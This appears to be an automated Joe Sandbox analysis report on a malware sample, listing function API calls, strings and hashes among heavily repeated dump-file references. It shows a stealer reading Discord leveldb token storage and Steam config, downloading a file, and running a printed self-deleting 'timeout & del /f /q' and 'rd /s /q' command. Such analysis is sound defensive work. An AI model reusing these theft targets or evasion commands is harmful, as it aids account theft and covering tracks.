                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$PointerReadUnothrow_t@std@@@__ehfuncinfo$??2@$Time$HandleInformationSizeSystem
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3339682767-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a12afba9e78c32b077de29fc2bf2f4a56658124f83e00c1daa060bbe9636f390
                                                                                                                                                                                                                                                                                      • Instruction ID: 7dc5ab211660f74088cffd7409125a6117dcca4ff2d4ad636a370f5fe0998741
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a12afba9e78c32b077de29fc2bf2f4a56658124f83e00c1daa060bbe9636f390
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1051F1B1604705AFE3208F15CC91B6BB7E8FB84744F10492DF595AB290D778E881CB59
                                                                                                                                                                                                                                                                                      Function 00415BF0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\discord\,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00415C48
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,0000001A), ref: 00415C68
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415C7F
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415C8D
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\Local Storage\leveldb\CURRENT), ref: 00415C99
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415CA3
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\Local Storage\leveldb), ref: 00415CAF
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411520: GetFileAttributesA.KERNEL32(00000000,?,?,?,0040B1C7,?,?,0000001C,0042150A), ref: 00411535
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00415700: GetProcessHeap.KERNEL32 ref: 00415715
                                                                                                                                                                                                                                                                                        • Part of subcall function 00415700: HeapAlloc.KERNEL32(00000000,00000000,0098967F), ref: 00415723
                                                                                                                                                                                                                                                                                        • Part of subcall function 00415700: wsprintfA.USER32 ref: 00415739
                                                                                                                                                                                                                                                                                        • Part of subcall function 00415700: FindFirstFileA.KERNEL32(?,?), ref: 0041574A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00415700: strlen.MSVCRT ref: 004157D3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00415700: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415811
                                                                                                                                                                                                                                                                                        • Part of subcall function 00415700: strlen.MSVCRT ref: 0041586B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcat$FileHeaplstrcpystrlen$AllocAttributesFindFirstFolderPathProcessmemcmpwsprintf
                                                                                                                                                                                                                                                                                      • String ID: \Local Storage\leveldb$\Local Storage\leveldb\CURRENT$\discord\
                                                                                                                                                                                                                                                                                      • API String ID: 1512132791-1179288657
                                                                                                                                                                                                                                                                                      • Opcode ID: 9ea078b67b35388310b02698df7125a1bb4528359370f3218b3db1cc30c085d2
                                                                                                                                                                                                                                                                                      • Instruction ID: db52eabd1130b4015811ae594007c4c182e7f7f0e4775522e0b09ec713fe86e8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ea078b67b35388310b02698df7125a1bb4528359370f3218b3db1cc30c085d2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D41A471900619ABC710EB719C86DEEB36CBF88348F40454AF64666052DB7CF6C58BA9
                                                                                                                                                                                                                                                                                      Function 00404100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 119networkfileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                      • InternetOpenA.WININET ref: 00404151
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,https), ref: 00404165
                                                                                                                                                                                                                                                                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404195
                                                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32 ref: 004041C9
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000400,-00000064), ref: 004041EB
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,-00000064,-00000044,00000000), ref: 00404205
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000400), ref: 0040422A
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00404231
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(-00000058), ref: 0040423A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                                                      • String ID: https
                                                                                                                                                                                                                                                                                      • API String ID: 2507841554-1056335270
                                                                                                                                                                                                                                                                                      • Opcode ID: c147ca11e88c7ddc157469b44d7132012a04bd987f341dfb92f5734880947861
                                                                                                                                                                                                                                                                                      • Instruction ID: e26aa42ddcce7a9dc6db16cb5d707b66fd772de428dd0f6f7d264c55934dbf87
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c147ca11e88c7ddc157469b44d7132012a04bd987f341dfb92f5734880947861
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9041E9719002199BDB10EFB0DD85BEE77B9EF84348F004029F901A7191DB78A98AC7E9
                                                                                                                                                                                                                                                                                      Function 00418400 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 108COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041841D
                                                                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00418444
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 0041854E
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00418573
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00418584
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpy$memset$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                                                                                                                                      • String ID: " & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                                                                                                                                                                                                                                                                      • API String ID: 86853776-1686486140
                                                                                                                                                                                                                                                                                      • Opcode ID: cf68e5ffe9d5c94084dc0a4ed0001313601785bbf26bd63883070f90d5ca4861
                                                                                                                                                                                                                                                                                      • Instruction ID: 7bf5b1220a567134bc8680c304d03b75e5346a68b302ecb6bd04b7556a355826
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf68e5ffe9d5c94084dc0a4ed0001313601785bbf26bd63883070f90d5ca4861
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3431B130B043446BE200AB6298D67BF77A69BD574CF00451EF4451A282DFBC6DC98B9B
                                                                                                                                                                                                                                                                                      Function 004110A0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 44memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004110B3
                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 004110BE
                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004110C9
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 004110D4
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004110E0
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004110EE
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004110FA
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                                                                                                                      • String ID: %dx%d$DISPLAY
                                                                                                                                                                                                                                                                                      • API String ID: 3940144428-3048177138
                                                                                                                                                                                                                                                                                      • Opcode ID: d4f6bdf6a8727250401686cbb5283f498457eeb982ee794fddf6dc554df9ea02
                                                                                                                                                                                                                                                                                      • Instruction ID: 594384e9460ea50e1c1a2799b2b5ef6833a83c8cc8fe28b05d57f5c36ffcb85d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4f6bdf6a8727250401686cbb5283f498457eeb982ee794fddf6dc554df9ea02
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 05F090713807047FF31027A5AC4EF2B7A5DEB84B56F110026BF06D72D2DAA56C1086F8
                                                                                                                                                                                                                                                                                      Function 00414FE0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 261registrystringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Valve\Steam,00000000,00020119,?), ref: 0041506F
                                                                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,SteamPath,00000000,00000000,?,000000FF), ref: 00415090
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414BD0: wsprintfA.USER32 ref: 00414BEE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414BD0: FindFirstFileA.KERNEL32(?,?), ref: 00414BFF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414BD0: strlen.MSVCRT ref: 00414CA9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414BD0: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00414CEB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414BD0: strlen.MSVCRT ref: 00414D57
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414BD0: memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00414D94
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00415099
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?,?,00000104), ref: 004150B8
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\config\), ref: 004150C4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
